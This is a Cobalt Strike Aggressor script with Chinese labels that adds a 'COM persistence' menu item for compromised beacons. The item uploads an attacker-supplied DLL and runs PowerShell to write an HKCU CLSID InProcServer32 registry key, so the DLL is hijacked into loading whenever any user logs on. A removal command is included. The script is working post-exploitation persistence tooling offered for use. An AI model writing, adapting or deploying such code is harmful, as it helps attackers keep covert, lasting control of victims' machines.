COM劫持利用脚本编写

sub Show_COM_GUI{$bid = $1;$dialog = dialog("COM劫持用户登陆", %(), lambda({    bupload($bid, $3['file']);    bmv($bid,$3['DLL_NAME'],$3['DLL_PATH'])    bpowerpick($bid,'Remove-Item "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}" -Recurse');    bpowerpick($bid,'New-Item -Type Directory "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}"');    #brun($bid,"reg add \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32\" /t REG_SZ /d \"".$3['DLL_PATH'].$3['DLL_NAME']"\" /f")    bpowerpick($bid,"New-Item -itemType String 'HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32' -Value  \"".$3['DLL_PATH'].$3['DLL_NAME']"\" ");    bpowerpick($bid,'Set-ItemProperty "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}\InProcServer32"  -name ThreadingModel -value Both');​}));dialog_description($dialog, "劫持任意用户登陆，任意用户登陆时将触发DLL. x64位用x64 dll,x86位用x86 dll。清除劫持:Remove-Item \"HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\\" -Recurse");drow_file($dialog, "file", "本地DLL路径: ");drow_text($dialog, "DLL_NAME", "DLL文件名:  ");drow_text($dialog, "DLL_PATH", "上传路径+DLL文件名:  ");dbutton_action($dialog, "Go");dialog_show($dialog);}​popup beacon_bottom {    item "&COM持久化" {        local('$bid');        foreach $bid ($1) {            Show_COM_GUI($bid);        }​    }}